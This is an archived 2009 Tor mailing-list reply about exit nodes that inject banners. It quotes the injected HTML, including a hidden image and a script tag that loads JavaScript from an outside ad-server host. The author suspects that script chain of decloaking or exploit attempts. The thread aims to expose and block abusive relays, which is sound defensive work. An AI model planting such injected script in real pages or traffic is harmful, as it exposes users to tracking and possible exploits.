[Author Prev][Author Next][Thread Prev][Thread Next][Author Index][Thread Index]
Re: Banners injected in web pages at exit nodes TRHCourtney*
- To: or-talk@xxxxxxxxxxxxx
- Subject: Re: Banners injected in web pages at exit nodes TRHCourtney*
- From: Freemor <freemor@xxxxxxxxx>
- Date: Tue, 2 Jun 2009 09:20:11 -0300
- Delivered-to: archiver@xxxxxxxx
- Delivered-to: or-talk-outgoing@xxxxxxxx
- Delivered-to: or-talk@xxxxxxxx
- Delivery-date: Tue, 02 Jun 2009 08:20:26 -0400
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:date:from:to:subject :message-id:in-reply-to:references:x-mailer:face:mime-version :content-type; bh=NbJbyeLiIfX4sD6SVrtvU8ux/YQBqrRFWzk+VUDk7sk=; b=UbcgJW29puNzXpPuAJsrUWsCaSZJBTKwspwG/DkpFc0otFDuve3e+XUkkbJyV0Ugrn BZkMLhKbLjHmVHTZYTaCuEKjxX53IF0OL6qZvY/XO8DEPjcqUPuEtlZVhRm5FgU69/xG 71spEex2iz1YvCAzqhwphP8D7GFjH/ZzY/+Fc=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=date:from:to:subject:message-id:in-reply-to:references:x-mailer :face:mime-version:content-type; b=wKFwM0ABALhdtdo5LHqUa4bcAVo9B7KhT0JPbmEzzrXLFV381v8HWVbSeFwUzj8QGH +XQlSiw0T3MK2pYzgUumRZWSEwH0yoEW6RD+1aBKw1VTs9aEG+5eBpwA6+XL5rI0FB9X INTHR8/9Ie3e7W2L2WrknKph6eOK6qperyy48=
- Face: iVBORw0KGgoAAAANSUhEUgAAADAAAAAwBAMAAAClLOS0AAAAFVBMVEXn2K356bi4xY5EMR+GuGqSkWzK+eFKflhGAAABqElEQVQ4jY3SzW7bMAwAYEqbexZToGdXiXseyvg+LG7Pjg32nGSr3v8RSlLyT4NmKAEDBr+QtKjA6ymlhp5SSlFehlTiHzx9DQnS/+Cd0i24WfGqr3epmgEKvKV0AkQfp7QDqTGozygRLB9WcMEcXvIIAFigdwWCVq4BJwB9ZhgfF3BaUODCeAWuwLACWMNxBV7xK4Bwo8JAQiHNHwU1TGHgtqTzw0jUL/CQTu7oSc5+37sQJzgLnDGddIdhEwFDyO1QdzCM9AzgWVrxUMYobIbLD2Lmu7RtmeNSgfxOkmne/gr3PoOts2F65hwDQD/DBmLkx4eGo+YlfIwZXGyiO1dNjDWC93HXdQbVMUgGsRlq2YmmZ5Csm5ZleYNgUG43+G4GqDRZRbuuUtDZkiu7WrBmYOlDZ1/XLHeOudNhX8AF+XQ5MYaYO5EepmY+5j+TzN5NUEst86/PnXT4n58KrZMmjUyvrkD/o9oq8Ay/M7S5U9VeV5AdYjPSArsMNl6udg0vCjIet7SCTqAVIPm1xDJDHquY4lvQrYH2stoJRvocGQ57uo69wAeDBdMp0Qij8AAAAABJRU5ErkJggg==
- In-reply-to: <e646fda30906020436q65f2e069ic873d253f057277f@xxxxxxxxxxxxxx>
- References: <20090602112258.C864914085B6@xxxxxxxxxxxxxx> <e646fda30906020436q65f2e069ic873d253f057277f@xxxxxxxxxxxxxx>
- Reply-to: or-talk@xxxxxxxxxxxxx
- Sender: owner-or-talk@xxxxxxxxxxxxx
On Tue, 2 Jun 2009 05:36:43 -0600
John Brooks <special@xxxxxxxxxxxxxxxx> wrote:
> Definitely abusive. Fortunately, because of how nearby most of the IPs
> are, Tor will treat them as family even if the operator neglected to,
> so it doesn't pose a risk to anonymity (other than the one outlying
> node, but even then it's a maximum of two), but this definitely looks
> like a badexit situation.
>
> Honestly, why does somebody run a tor node if they keep
> connection/session logs? Seems like an odd place to look for a
> paycheck.
>
> - John Brooks
>
Might be worse then that.. at least for improperly configures clients..
there deos seem to be javascript injection:
<div id="floaterma9">
<img src="http://courtney.nullroute.net/2lol.gif";
style="display:none"></img> <script type='text/javascript'
src='http://courtney.nullroute.net/openx-2.8.1/www/delivery/spcjs.php?id=1'></script>
<style> body {
margin: 0 0 0 0 !important;
}
#Banner2 {
width:728px;
height:90px;
}
#textme {
font-family:arial;
color:#333;
font-size:11px;
}
</style>
When I Followed
http://courtney.nullroute.net/openx-2.8.1/www/delivery/spcjs.php?id=1
it had an interesting bit bit of code which linked to:
http://courtney.nullroute.net/openx-2.8.1/www/delivery/fl.js
Which tries to load up SWF objects..
Haven't picked it all apart yet (still no coffee) but I'm guessing it's
either decloaking attempts or exploit attempts.
--
freemor@xxxxxxxxx
freemor@xxxxxxxx
This e-mail has been digitally signed with GnuPG - ( http://gnupg.org/ )
Attachment:
signature.asc
Description: PGP signature